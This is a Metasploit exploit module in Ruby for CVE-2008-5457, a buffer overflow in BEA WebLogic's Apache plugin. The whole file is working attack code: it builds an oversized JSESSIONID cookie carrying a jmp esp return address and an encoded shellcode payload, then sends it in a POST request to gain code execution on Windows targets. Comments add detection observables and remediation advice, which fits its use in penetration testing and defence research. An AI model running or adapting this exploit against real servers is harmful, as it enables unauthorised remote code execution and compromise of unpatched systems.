Path: blob/master/modules/exploits/windows/http/bea_weblogic_jsessionid.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2008-5457 (OSVDB 51311): a buffer overflow in the
# BEA WebLogic plugin for Apache. Per the module description, the vulnerable
# code is reachable only when clustering is configured, and it is triggered by
# a single HTTP request carrying an oversized JSESSIONID cookie value.
#
# Observables that follow directly from the request built in #exploit (useful
# for detection): a POST to /index.jsp whose Cookie header contains the literal
# cookie `TAGLINE=IAMMCLOVIN` followed by a JSESSIONID value of 10000
# alphanumeric characters. Applying the vendor fix, or leaving clustering
# disabled where it is not needed, removes the vulnerable code path.
#
# NOTE(review): the Seh mixin is included but none of its helpers are called;
# the return address is written straight into the buffer at offset 8181.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Registers the module metadata (name, references, payload constraints,
  # targets) with the framework and exposes RPORT (default 80) as the only
  # additional option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BEA WebLogic JSESSIONID Cookie Value Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable
        code is only accessible when clustering is configured. A request containing a
        long JSESSION cookie value can lead to arbitrary code execution.
      },
      'Author'         => 'pusscat',
      'References'     =>
        [
          [ 'CVE', '2008-5457' ],
          [ 'OSVDB', '51311' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Payload'        =>
        {
          # At most 800 bytes of encoded payload; #exploit writes it at offset
          # 8185 of a 10000-byte buffer, so it always fits.
          'Space'    => 800,
          # NUL, CR, LF, space, ';', '=' and ',' are excluded from the encoded
          # payload — presumably because they delimit or terminate the Cookie
          # header value; confirm against the plugin's cookie parsing.
          'BadChars' => "\x00\x0d\x0a\x20\x3B\x3D\x2C",
          'StackAdjustment' => -3500,
        },
      # One entry per affected build of the WebLogic Apache module; 'Ret' is
      # the address of a jmp esp instruction in that build, and DefaultTarget
      # selects the second entry (index 1).
      'Targets'        =>
        [
          [ 'Windows Apache 2.2 - WebLogic module version 1.0.1136334',
            {
              'Ret' => 0x1006c9b5, # jmp esp
            }
          ],
          [ 'Windows Apache 2.2 - WebLogic module version 1.0.1150354',
            {
              'Ret' => 0x1006c9be, # jmp esp
            }
          ],
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => '2009-01-13'))

    register_options(
      [
        Opt::RPORT(80)
      ])
  end

  # Builds the single malicious request, sends it over the framework-managed
  # TCP socket and hands control to the payload handler.
  #
  # Layout of the 10000-byte cookie value (offsets into `sploit`):
  #   [0, 8181)     random alphanumeric filler
  #   [8181, 8185)  target.ret packed as a little-endian DWORD ('V')
  #   [8185, ...)   payload.encoded (at most 800 bytes per 'Space')
  # The filler is generated with payload_badchars excluded, so the whole cookie
  # value stays free of the delimiters listed in 'BadChars'.
  #
  # `target`, `payload`, `payload_badchars`, `connect`, `sock`, `handler` and
  # `disconnect` are provided by Msf::Exploit::Remote and the Tcp mixin.
  def exploit
    sploit = Rex::Text.rand_text_alphanumeric(10000, payload_badchars)
    sploit[8181, 4] = [target.ret].pack('V')
    sploit[8185, payload.encoded.length] = payload.encoded

    # NOTE(review): the Host header is hard-coded to localhost rather than
    # derived from RHOST; the rest of the request is fixed apart from `sploit`.
    request =
      "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=" +
      sploit +
      "\r\n\r\n"

    connect
    sock.put(request); # NOTE(review): trailing semicolon is a no-op in Ruby
    handler

    disconnect
  end
end